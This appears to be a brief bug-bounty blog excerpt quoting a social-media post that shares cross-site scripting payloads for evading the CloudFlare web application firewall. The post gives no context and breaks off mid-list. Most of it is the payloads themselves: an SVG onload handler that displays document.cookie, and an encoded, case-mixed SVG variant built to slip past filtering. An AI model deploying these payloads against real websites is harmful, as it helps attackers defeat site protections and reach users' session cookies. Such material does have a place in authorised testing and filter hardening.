BugHuntingTips shared some top XSS WAF bypass payloads for CloudFlare WAF. The payloads include various encoded SVG elements triggering alert and confirmation prompts. These payloads demonstrate techniques to evade CloudFlare WAF protection. Learn more about these payloads and their impact in the blogpost.
BugHuntingTips ?
SOME OF THE TOP XSS WAF BYPASS PAYLOADS 🙂
CloudFlare WAF:
<svg onload=alert(document.cookie)>
<svg/oNLY%3d1/**/On+ONLoaD%3dcou006efirm%26%23×28%3b%26%23×29%3b><Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NLZCA6KQ=="))>
Cloudfront…
— 0xRAYAN (@0xRAYAN7) May 22, 2024